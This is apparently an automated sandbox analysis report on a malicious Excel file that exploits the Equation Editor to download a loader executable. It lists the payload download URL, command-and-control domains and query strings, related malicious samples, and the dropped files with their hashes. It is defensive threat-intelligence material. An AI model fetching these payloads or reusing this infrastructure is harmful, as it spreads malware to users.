Classification: mal100.troj.expl.evad.winXLSX@9/21@5/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 23.9% (good quality ratio 23%)
• Quality average: 76%
• Quality standard deviation: 27.6%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Not all processes were analyzed; report is missing behavior information
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
08:03:00 | API Interceptor | 58x Sleep call for process: EQNEDT32.EXE modified
08:03:06 | API Interceptor | 89x Sleep call for process: vbc.exe modified
08:03:31 | API Interceptor | 231x Sleep call for process: raserver.exe modified
08:04:16 | API Interceptor | 1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
192.210.173.40 | MT103-payment confirmation.xlsx | malicious | 192.210.173.40/files/loader2.exe
192.210.173.40 | Agency Appointment for Mv TBN Port-Appointment Letter- 2100133.xlsx | malicious | 192.210.173.40/files/loader1.exe
217.70.184.50 | a8eC6O6okf.exe | malicious | www.spinecompanion.com/bp3i/?V0Gp=UA97/2DJKNyumeI/h5VkqIpiqoWZJQJausvjwzEKvvQrM4qFs4MFdVXHVZp7e8qHij8k&PF=5jiDaNi8a4RT0
217.70.184.50 | LQrGhleECP.exe | malicious | www.kerneis.net/dxe/?W8Mp8l=EMRsx9fCGFv+Z/uXaKRVWfbVyNOVwQmG3TCu/sVfm21gNCdRdP/aj/X/Ya9EGFlym1M9&j6t4MD=ktcPu
217.70.184.50 | Shipping Documents.exe | malicious | www.kerneis.net/dxe/?Cj6d=EMRsx9fCGFv+Z/uXaKRVWfbVyNOVwQmG3TCu/sVfm21gNCdRdP/aj/X/YZR+FEJJlCtszIEqKg==&vTdDF=LHQP
217.70.184.50 | NEW ORDER.exe | malicious | www.kerneis.net/dxe/?1b=jnK0MdUxr&wPX=EMRsx9fCGFv+Z/uXaKRVWfbVyNOVwQmG3TCu/sVfm21gNCdRdP/aj/X/Ya9uZ1Vyi3E9
217.70.184.50 | PROFORMA INVOICE-INV393456434.pdf.exe | malicious | www.austincitylegacy.net/sbqi/?nzrT8h=5jRDMLpHNB&QPdT=pgb9D/PyRsR2P8Rfcnc63bnRKjjOxGgQIVBJoMGEpGP0DVW1ouPUMF6x0wgSHY4jNjfL
217.70.184.50 | Order.exe | malicious | www.bwi.email/n30n/?N4=sdzwhKEGHT5Oq+zhiQYBdgzNtzFLrgkMEJro0zr3FqzAITy7AmDQTvZigHUM/Gj1G+o+&sZ=XnzpWlcx
217.70.184.50 | Confirmación de pago.exe | malicious | www.littlemlive.com/uidr/?tFQt=hCyUdEVC+/e0kqIc4rEIzsqLVd3ukP9NmRqnWpj1TlcqQyXYjjC7/9+R8pIHeD4GOA8b&CTp0=ctxDHzZH
217.70.184.50 | remittanceslip_pdf.exe | malicious | www.gumboprivacy.com/cu6o/?uN6x=Rx6r56djeiIgLt3S7FmXbWU20G6eWx4/TW0QyaIMZ61zjOw+pkhnowl+Nm39n2CMiIEO&Vtx0E=FDHHERlxjn8PMDI
217.70.184.50 | zMJhFzFNAz.exe | malicious | www.goal123news.com/idir/?zZ0lQ0=0rl7bJpWRK0Pe3no9PtjK1UhgdmY8kYeQz99z2eN40QIAD0ApdRxEBPwtIjRaXNBs2l8&Wzr=H2MDx8O8kJn8f
217.70.184.50 | Xi4vVgHekF.exe | malicious | www.jimboprivacy.com/rina/?wFN0DX=UtX8E&GFQL=NOAI9qIOQ3yErtXvbR+jV4oaziO+RpBKgWbw760Ol/JjIhawxc6z4McipwAub27bq8xF
217.70.184.50 | rcx41011_exe.exe | malicious | www.immobiliervaldoingt.com/krc/?t8bH=9wvyVqxAKYo2IasQqO4dP/s53BB7SlNoNX4IITEmxILAdb/8cW1wefOGBYznHigLeQ6K&2d=llxh
217.70.184.50 | WlBvCPCRcs.exe | malicious | www.oraghallaighjourney.net/oean/?BBZ=OxlhVXB8mRxx4&YV8h-V18=VEdaFLAJj+BqSPb+RWTgvGBLVmUULtjZemD+R4RxJuQ1Gw4oAgGERQRzU3+qdkHE3x8g
217.70.184.50 | HwL7D1UcZG.exe | malicious | www.lebaronfuneraire.com/eaud/?KnUt5D=WAvmXqQ2SDolw2MVNr0JQneOuJHUyTLsb+pO5S4ClyTL3PcY6xI1EV2X3CXrMZO5eHnIpOu44Q==&Tj=K2Jxlty0LFD4LFOP
217.70.184.50 | CREDIT NOTE DEBIT NOTE 30.1.2021.xlsx | malicious | www.lebaronfuneraire.com/eaud/?t2M8bRGP=WAvmXqQzSEohwmAZPr0JQneOuJHUyTLsb+xelRkDhSTK3+we9hZ5SROV0kXtU4WxSxTpww==&efipT=8pD4qrqpF2f
217.70.184.50 | c8TrAKsz0T.exe | malicious | www.mrbalumba.com/j5an/?tXR=NXeX2&k2JdyL=JhEfkztXJMY5LiIumZWSUP2MeQ6dDSZJVYbrEGMlqPincr34GucJwKwMyE8kFWr9EL4X
217.70.184.50 | PO 2420208.exe | malicious | www.rascalblack.com/dtra/?Rx=8pyTKT4hfnblTr&YH6XAPZH=qq+gc7IeNksL8uZB1nitLdTNLNPu3PZqpRNbeaZMXdB2VER7GEGc/5Za+KAUPz7IA3e4
217.70.184.50 | winlog(1).exe | malicious | www.oraghallaighjourney.net/oean/?u4XpH=VEdaFLAJj+BqSPb+RWTgvGBLVmUULtjZemD+R4RxJuQ1Gw4oAgGERQRzU0SQelr/0Gdx7EUjIA==&8pNhXv=yVML0zB0
217.70.184.50 | sLUAeV5Er6.exe | malicious | www.oraghallaighjourney.net/oean/?BjU=VEdaFLAJj+BqSPb+RWTgvGBLVmUULtjZemD+R4RxJuQ1Gw4oAgGERQRzU0SpBUL86QB27EUkbw==&ndn4iR=9rw83dnx_NFt
217.70.184.50 | GkrIJKmWHp.exe | malicious | www.lebaronfuneraire.com/eaud/?NVdPH2=WAvmXqQ2SDolw2MVNr0JQneOuJHUyTLsb+pO5S4ClyTL3PcY6xI1EV2X3CbrfJC6HXne&w2=iDHXzlIh4
217.70.184.50 | e0ciSGkcJn.exe | malicious | www.oraghallaighjourney.net/oean/?E61l=VEdaFLAJj+BqSPb+RWTgvGBLVmUULtjZemD+R4RxJuQ1Gw4oAgGERQRzU0eQN1n8tWdn&nPntH8=dXbHpDFHFzJx

Domains

Match | Associated Sample Name / URL | Detection | Context
webredir.vip.gandi.net | a8eC6O6okf.exe | malicious | 217.70.184.50
webredir.vip.gandi.net | LQrGhleECP.exe | malicious | 217.70.184.50
webredir.vip.gandi.net | Shipping Documents.exe | malicious | 217.70.184.50
webredir.vip.gandi.net | NEW ORDER.exe | malicious | 217.70.184.50
webredir.vip.gandi.net | PROFORMA INVOICE-INV393456434.pdf.exe | malicious | 217.70.184.50
webredir.vip.gandi.net | Order.exe | malicious | 217.70.184.50
webredir.vip.gandi.net | Confirmación de pago.exe | malicious | 217.70.184.50
webredir.vip.gandi.net | remittanceslip_pdf.exe | malicious | 217.70.184.50
webredir.vip.gandi.net | zMJhFzFNAz.exe | malicious | 217.70.184.50
webredir.vip.gandi.net | Xi4vVgHekF.exe | malicious | 217.70.184.50
webredir.vip.gandi.net | rcx41011_exe.exe | malicious | 217.70.184.50
webredir.vip.gandi.net | WlBvCPCRcs.exe | malicious | 217.70.184.50
                                                                                                                                                            HwL7D1UcZG.exeGet hashmaliciousBrowse
                                                                                                                                                            • 217.70.184.50
                                                                                                                                                            CREDIT NOTE DEBIT NOTE 30.1.2021.xlsxGet hashmaliciousBrowse
                                                                                                                                                            • 217.70.184.50
                                                                                                                                                            c8TrAKsz0T.exeGet hashmaliciousBrowse
                                                                                                                                                            • 217.70.184.50
                                                                                                                                                            PO 2420208.exeGet hashmaliciousBrowse
                                                                                                                                                            • 217.70.184.50
                                                                                                                                                            winlog(1).exeGet hashmaliciousBrowse
                                                                                                                                                            • 217.70.184.50
                                                                                                                                                            sLUAeV5Er6.exeGet hashmaliciousBrowse
                                                                                                                                                            • 217.70.184.50
                                                                                                                                                            GkrIJKmWHp.exeGet hashmaliciousBrowse
                                                                                                                                                            • 217.70.184.50
                                                                                                                                                            e0ciSGkcJn.exeGet hashmaliciousBrowse
                                                                                                                                                            • 217.70.184.50

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
AS-COLOCROSSINGUS
GANDI-ASDomainnameregistrar-httpwwwgandinetFR

JA3 Fingerprints

No context

Dropped Files

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
C:\Users\user\AppData\Local\Temp\nsoA180.tmp\System.dll

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category: downloaded
Size (bytes): 225177
Entropy (8bit): 7.913752075626111
Encrypted: false
SSDEEP: 3072:DQIURTXJ+MwMy2ZeD0EUquupJDoeGgFq+HAgDtI7LXZ2sQYvvlIieO82WbyXVvE4:Ds9wMReDph9AOI7LXosQQBBFsuyQUvnk
MD5: 116E736BA00FCA4B8499C4DF00796454
SHA1: A8D3D62DB4BD49E24C2BDA3D0D81C3BE25A81DAE
SHA-256: 096CA35528EF4F702E93F5F17D7954F26FB48ACD4526794CE1EE99D27CF1A4C3
SHA-512: 02DDAB82DD68FAA0627C15320DE3E0B118B1CC95FEE80FC013E57ED773A9420AF5B23F3BB7F9CCAC216C88581B665DB29BD1CA5E03F7E0B52F9C542D75B57F78
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 28%
Reputation: low
IE Cache URL: http://192.210.173.40/files/loader1.exe
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1078C856.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 84203
Entropy (8bit): 7.979766688932294
Encrypted: false
SSDEEP: 1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5: 208FD40D2F72D9AED77A86A44782E9E2
SHA1: 216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256: CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512: 7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\491F12AC.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 51166
Entropy (8bit): 7.767050944061069
Encrypted: false
SSDEEP: 1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
MD5: 8C29CF033A1357A8DE6BF1FC4D0B2354
SHA1: 85B228BBC80DC60D40F4D3473E10B742E7B9039E
SHA-256: E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
SHA-512: F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FF7B8C5.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 79394
Entropy (8bit): 7.864111100215953
Encrypted: false
SSDEEP: 1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5: 16925690E9B366EA60B610F517789AF1
SHA1: 9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256: C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512: AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\72F1B508.emf
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 7608
Entropy (8bit): 5.091127811854214
Encrypted: false
SSDEEP: 96:+SDjyLSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5Djr+sW31RGtdVDYM3VfmkpH
MD5: EB06F07412A815AED391F20298C1087B
SHA1: AC0601FFC173F50B56C3AE2265C61B76711FBE01
SHA-256: 5CA81C391E8CA113254221D535BE4E0677908DA61DE0016EC963DD443F535FDE
SHA-512: 38AEF603FAC0AB6FB7159EBA5B48BD7E191A433739710AEACB11538E51ADA5E99CD724BE5B3886986FCBB02375B0C132B0C303AE8838602BCE88475DDD727A49
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\865A705F.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 50311
Entropy (8bit): 7.960958863022709
Encrypted: false
SSDEEP: 768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
MD5: 4141C7515CE64FED13BE6D2BA33299AA
SHA1: B290F533537A734B7030CE1269AC8C5398754194
SHA-256: F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
SHA-512: 74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9A0C7C6E.jpeg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category: dropped
Size (bytes): 8815
Entropy (8bit): 7.944898651451431
Encrypted: false
SSDEEP: 192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5: F06432656347B7042C803FE58F4043E1
SHA1: 4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256: 409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512: 358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AAE4FF60.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 84203
Entropy (8bit): 7.979766688932294
Encrypted: false
SSDEEP: 1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5: 208FD40D2F72D9AED77A86A44782E9E2
SHA1: 216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256: CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512: 7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CE6FE002.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 51166
Entropy (8bit): 7.767050944061069
Encrypted: false
SSDEEP: 1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
MD5: 8C29CF033A1357A8DE6BF1FC4D0B2354
SHA1: 85B228BBC80DC60D40F4D3473E10B742E7B9039E
SHA-256: E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
SHA-512: F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D22F6169.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 49744
Entropy (8bit): 7.99056926749243
Encrypted: true
SSDEEP: 768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5: 63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1: 8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256: AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512: BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D4A48ED4.jpeg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category: dropped
Size (bytes): 8815
Entropy (8bit): 7.944898651451431
Encrypted: false
SSDEEP: 192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5: F06432656347B7042C803FE58F4043E1
SHA1: 4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256: 409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512: 358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DBC137E1.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 50311
Entropy (8bit): 7.960958863022709
Encrypted: false
SSDEEP: 768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
MD5: 4141C7515CE64FED13BE6D2BA33299AA
SHA1: B290F533537A734B7030CE1269AC8C5398754194
SHA-256: F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
SHA-512: 74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E25AB663.emf
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 648132
Entropy (8bit): 2.8124530118203914
Encrypted: false
SSDEEP: 3072:134UL0tS6WB0JOqFB5AEA7rgXuzqr8nG/qc+L+:l4UcLe0JOcXuurhqcJ
MD5: 955A9E08DFD3A0E31C7BCF66F9519FFC
SHA1: F677467423105ACF39B76CB366F08152527052B3
SHA-256: 08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
SHA-512: 39A2A0C062DEB58768083A946B8BCE0E46FDB2F9DDFB487FE9C544792E50FEBB45CEEE37627AA0B6FEC1053AB48841219E12B7E4B97C51F6A4FD308B52555688
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EF212C1B.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 49744
Entropy (8bit): 7.99056926749243
Encrypted: true
SSDEEP: 768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5: 63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1: 8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256: AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512: BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2F42597.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 79394
Entropy (8bit): 7.864111100215953
Encrypted: false
SSDEEP: 1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5: 16925690E9B366EA60B610F517789AF1
SHA1: 9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256: C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512: AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious: false
C:\Users\user\AppData\Local\Temp\liw53s6e5g55t9
Process: C:\Users\Public\vbc.exe
File Type: data
Category: dropped
Size (bytes): 164864
Entropy (8bit): 7.998820292327425
Encrypted: true
SSDEEP: 3072:Qqr+Z8fcISfrPPGq2fMtOxyTAUPDhBWgOrigfLekt4S:drlEXrPB2EtLTvbh21eq4S
MD5: 68A3F57B8B343B5F9BF05C9F35A086A3
SHA1: 29015249F259A9AAF76D3AD6774019CFBBD118FD
SHA-256: D2D0C6EC98898B2B21BE258090B267AA98A5C4FEA808B37DC7BBAF38B900246F
SHA-512: 36538D7036BB092DC2E126387DAE328FB68EA53D3D7F8F3126AA986117EC569B32F11EC925192F75C1C7FA225BAF1C4BA88551F1AAF860444139E4A8ECC68B33
Malicious: false
                                                                                                                                                                                                    Preview: Q.Uc5.0..@..C6.,.(.../7...1.H]..$9.p.].#.|......?.2.e.$..3p....:.Dt .<...[...=.kJ.p(|Y.#I:Eq.....T...!);A......u.t.....*....IZo..z..2..S...h.pu.&.?.]....U.@9*.V.:.......d.-..........C..I.8...8nZ..k.....jRY..../.P.....a...h..\.{gv.m22........r..8g....A..<....I.N.L..LB+.A.|..9........l.L..'...>aQ6..K.|.^P..%.Hu.{.....c^.....r..>.X.j6+/.1..E#m../.x....h..<.#.p.G...!..p.~.H.SL..%...j.Cg.}V....p....:..z.-H.....%57`.._I..........l.....,x .jU....<.h-6L..."-yy...X.KA.$YT......z.$].R..>..M@q.)...6F.v27|l.4.@b!.h.I6{@.%..aP.~..HcX..%.<.h../.A....;.....:..X.Na....A.s,:..&..F..q..'.r.(!,..p.^..+.......F..%.?..>......c.e........Y......A@}....Ke..W{j.^?.xnD.I.g......,.....`...b.....yu.6.]....ud.U.z.1.?@-..6u.-.`..K*..$.T9J..bo....K.WA ....,:.Sd[Iz#.txD..)...v.....}.....]..4L.....^...:B....4|..sM..Q..2....mK...>.D~....+8[?.=.9..X!r.4.......~..c.!d}...hR&ee.`..... ......d....G..G...k..}...._#G..O..{....hw....s23p....-v.5...p.......,...F.^W....T..P".
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\nsoA17F.tmp
                                                                                                                                                                                                    Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):261211
                                                                                                                                                                                                    Entropy (8bit):7.359115600393562
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3072:7Sa/qr+Z8fcISfrPPGq2fMtOxyTAUPDhBWgOrigfLekt4l20fjumGLPNt:WaSrlEXrPB2EtLTvbh21eq4V7LGLFt
                                                                                                                                                                                                    MD5:AB8B0B65B223CDF58819B06790B548E2
                                                                                                                                                                                                    SHA1:0B678EAD9F82893461CC99EF27BEF78A3F3115F8
                                                                                                                                                                                                    SHA-256:205ACFB8E6DCF7203E2CE11F386D70851ABA48F2D7FF011A0B750E8092F94D29
                                                                                                                                                                                                    SHA-512:FA39DFB9E056C2EFFB8C1F28339C9A7487C3239E2042E8DFE7ECD87FC510A32824B1A5AADF98BFA57B3039736AB8317241453FB6BB6DAAE7208FC64A685125CB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .m......,.......................LP......$l.......l..............................................................#...........................................................................................................................................................................J...................j...........................................................................................................................................W...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\nsoA180.tmp\System.dll
                                                                                                                                                                                                    Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):11776
                                                                                                                                                                                                    Entropy (8bit):5.855045165595541
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                                                                                                                    MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                                                                                                                    SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                                                                                                                    SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                                                                                                                    SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Metadefender, Detection: 0%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                    • Filename: New Order PO2193570O1.pdf.exe, Detection: malicious
                                                                                                                                                                                                    • Filename: 2320900000000.exe, Detection: malicious
                                                                                                                                                                                                    • Filename: CshpH9OSkc.exe, Detection: malicious
                                                                                                                                                                                                    • Filename: 5SXTKXCnqS.exe, Detection: malicious
                                                                                                                                                                                                    • Filename: i6xFULh8J5.exe, Detection: malicious
                                                                                                                                                                                                    • Filename: AWB00028487364 -000487449287.doc, Detection: malicious
                                                                                                                                                                                                    • Filename: 090049000009000.exe, Detection: malicious
                                                                                                                                                                                                    • Filename: dYy3yfSkwY.exe, Detection: malicious
                                                                                                                                                                                                    • Filename: PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx, Detection: malicious
                                                                                                                                                                                                    • Filename: Purchase Order Price List 061021.xlsx, Detection: malicious
                                                                                                                                                                                                    • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious
                                                                                                                                                                                                    • Filename: UGGJ4NnzFz.exe, Detection: malicious
                                                                                                                                                                                                    • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious
                                                                                                                                                                                                    • Filename: 3arZKnr21W.exe, Detection: malicious
                                                                                                                                                                                                    • Filename: Shipping receipt.exe, Detection: malicious
                                                                                                                                                                                                    • Filename: New Order TL273723734533.pdf.exe, Detection: malicious
                                                                                                                                                                                                    • Filename: YZ8OvkljWm.exe, Detection: malicious
                                                                                                                                                                                                    • Filename: U03c2doc.exe, Detection: malicious
                                                                                                                                                                                                    • Filename: QUOTE061021.exe, Detection: malicious
                                                                                                                                                                                                    • Filename: PAYMENT CONFIRMATION.exe, Detection: malicious
